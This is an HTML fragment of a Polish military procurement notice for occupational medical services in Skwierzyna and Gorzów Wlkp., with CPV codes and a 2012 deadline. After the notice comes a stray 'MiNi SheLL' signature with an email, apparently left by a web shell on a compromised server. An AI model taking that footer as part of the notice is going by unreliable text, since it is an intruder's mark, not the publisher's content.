<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 - Usługi medyczne dla żołnierzy i pracowników Jednostki Wojskowej 3949 
w Skwierzynie oraz WKU w Gorzowie Wlkp. będących na zaopatrzeniu 45 WOG (zał. 2c do SIWZ) . Wykonawca realizujący przedmiot zamówienia musi dysponować gabinetem lekarskim medycyny pracy oraz bazą do wykonywania badań laboratoryjnych i innych określonych w załączniku nr 2 do SIWZ w odległości do 50km od siedziby JW. 3949 w Skwierzynie oraz WKU i Pracowni Psychologicznej w Gorzowie Wlkp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.00.00-6, 85.12.12.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com